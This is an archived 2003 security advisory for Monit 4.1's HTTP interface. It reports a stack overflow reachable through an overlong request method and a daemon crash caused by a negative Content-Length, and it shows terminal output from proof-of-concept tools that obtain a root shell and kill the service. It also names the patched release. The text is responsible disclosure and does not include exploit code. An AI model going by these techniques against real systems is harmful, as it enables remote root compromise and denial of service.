what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Adv-20031124.txt

Adv-20031124.txt
Posted Nov 25, 2003
Authored by Evgeny Legerov

S-Quadra Advisory #2003-11-24 - Monit version 4.1 is susceptible to a denial of service via a negative Content-length field and is also vulnerable to a stack overflow when accepting long HTTP requests.

tags | advisory, web, denial of service, overflow
SHA-256 | 640b7a1304c873c6888f2e239b9dd442a50d1a7bfc300a638ff7e843e49e4c1d

Adv-20031124.txt

Change Mirror Download
            S-Quadra Advisory #2003-11-24

Topic: Monit 4.1 HTTP interface Multiple Security Vulnerabilities
Severity: High
Vendor URL: http://www.tildeslash.com/monit/
Advisory URL: http://www.s-quadra.com/advisories/Adv-20031124.txt
Release date: 22 Nov 2003

1. DESCRIPTION

Monit (http://www.tildeslash.com/monit/) is a utility for managing and
monitoring, processes, files, directories and devices on a Unix system.
It conducts automatic maintenance and repair and can execute meaningful
causal actions in error situations.
Monit provides a HTTP(S) interface and you can use a browser to access
the monit server.

There exists several security vulnerabilites in Monit HTTP interface,
which could allow an attacker
in the worst case to gain root access to the system.

2. DETAILS

-- Vulnerability 1: Long http method stack overflow

By supplying an overly large http request method and attacker could
trigger a stack overflow condition which may lead to a remote root
compromise.
Below is a successfull run of 'xonya' Monit <= 4.1 remote root exploit
(PoC):

$./xonya -t 3 -p 2812 192.168.3.12

Selected platform 3 ...
Retaddr is 0xXXXXXXXX, nulladdr is 0xXXXXXXXX ...
Connected to 192.168.3.12:2812
Sending the request ...
Got a remote shell:

Linux 2.4.20 i686 unknown
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
exit

-- Vulnerability 2: Denial of Service via negative Content-Length field

By supplying a negative value in Content-Length header an attacker could
cause a xmalloc() failure and kill a Monit daemon.
Below is a successfull run of 'donit' Monit <= 4.1 remote Denial of
Service exploit (PoC):

$./donit -p 2812 192.168.3.12

Connecting to 192.168.3.12:2812 ...
Sending the request ...
Done.

$ nc -v 192.168.3.12 2812
lina.s-quadra.com [192.168.3.12] 2812 (?) : Connection refused

3. FIX INFORMATION

S-Quadra alerted Monit development team to this issue on 21th November 2003.
New version of Monit 4.1.1 is available at
http://www.tildeslash.com/monit/dist/monit-4.1.1.tar.gz which fixes the
reported security vulnerabilities.

4. CREDITS

Evgeny Legerov <e.legerov@s-quadra.com> is responsible for discovering
this issue.

5. ABOUT

S-Quadra offers services in computer security, penetration testing and
network assesment,
web application security, source code review and third party product
vulnerability assesment,
forensic support and reverse engineering.

Security is an art and our goal is to bring responsible and high quality
security
service to the IT market, customized to meet the unique needs of each
individual client.

S-Quadra, (pronounced es quadra), is not an acronym.
It's unique, creative and innovative - just like the security services
we bring to our clients.

S-Quadra Advisory #2003-11-24


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close